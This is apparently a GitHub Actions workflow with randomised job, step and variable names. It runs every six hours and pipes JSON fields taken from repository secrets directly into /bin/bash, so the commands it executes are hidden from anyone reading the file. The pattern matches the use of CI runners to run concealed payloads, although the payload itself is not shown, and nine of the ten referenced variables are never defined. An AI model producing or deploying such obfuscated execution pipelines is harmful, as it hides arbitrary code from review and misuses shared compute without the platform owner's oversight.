name: fangqidong6789

on:
  workflow_dispatch:
  schedule:
    - cron: '48 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fangqidong6789
        env:
          wofdj23: ${{ secrets.wofdj23 }}
        run: |
          echo $wofdj23 | jq -r .nt49 | /bin/bash
          echo $i81188 | jq -r .t46640 | /bin/bash
          echo $g3 | jq -r .hohph94 | /bin/bash
          echo $my80713 | jq -r .pcwxt3 | /bin/bash
          echo $p1 | jq -r .t9216 | /bin/bash
          echo $bqpzc6911 | jq -r .kmgy82 | /bin/bash
          echo $p6019 | jq -r .woz3507 | /bin/bash
          echo $i7 | jq -r .gr655 | /bin/bash
          echo $hixyq60 | jq -r .gryrn69920 | /bin/bash
          echo $ve3156 | jq -r .tzik3151 | /bin/bash

